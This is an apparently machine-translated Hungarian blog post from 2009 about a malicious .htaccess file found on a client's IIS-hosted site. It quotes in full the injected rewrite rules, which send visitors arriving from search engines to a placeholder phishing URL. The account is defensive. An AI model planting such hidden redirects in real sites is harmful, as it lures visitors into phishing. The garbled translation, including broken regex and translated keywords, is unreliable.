Csütörtök, Január 22., 2009 | Szerző:

Én csak nemrég találtam egy problémát az ügyfél honlapján miatt .htaccess reszelő. A webhelyet a A Windows szerver fut IIS a IISPassword, amely él .htaccess fájlokat a beállítások.

IISPassword nem követi pontosan ugyanazok a szabályok vonatkoznak, mint a Apache viszont. Ha a. Htaccess fájl létezik, akkor kell tartalmaznak IISPassword-megfelelő szabályokat, ellenkező esetben a kiszolgáló csak a következő hibaüzenet:

Error 500 given by IIS Password
Itt a tartalmát. Htaccess fájl. Már csak módosította a végső átirányítás URL rámutatni example.com megfelelő:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*AOL. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*msn. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*Yandex. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*rambler. * $ [NC,VAGY]
RewriteCond %{HTTP_REFERER} .*Már. $ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,A]

Ha ez a voltak a szerveren futó Apache mod_rewrite, a legtöbb internetes felhasználók közvetlenül a megfelelő oldal tartalmát. Csak akkor, ha elérték az oldalon keresztül a keresőmotorok, és indexek felsorolt. Htaccess, tennének átirányítja a siffy adathalász URL-t, hogy a cracker akar áldozatok elérni.

Persze, A cracker (vagy talán még egy automatizált féreg) nem vette észre, hogy a szerver a kérdés nem is támogatja ezeket a mod_rewrite szabályokat. De akár így, ez nagyon aggasztó, mint én is előre sok érv-e vagy sem az oldal dolgozó

Ossza meg
Kategória: hosting, véletlen
Tudod követ akármi válasz-hoz ez belépés átmenő a RSS 2.0 etet. Tudod hagy egy válasz, vagy trackback saját honlapján.
Hagy egy Válaszol » Bejelentkezés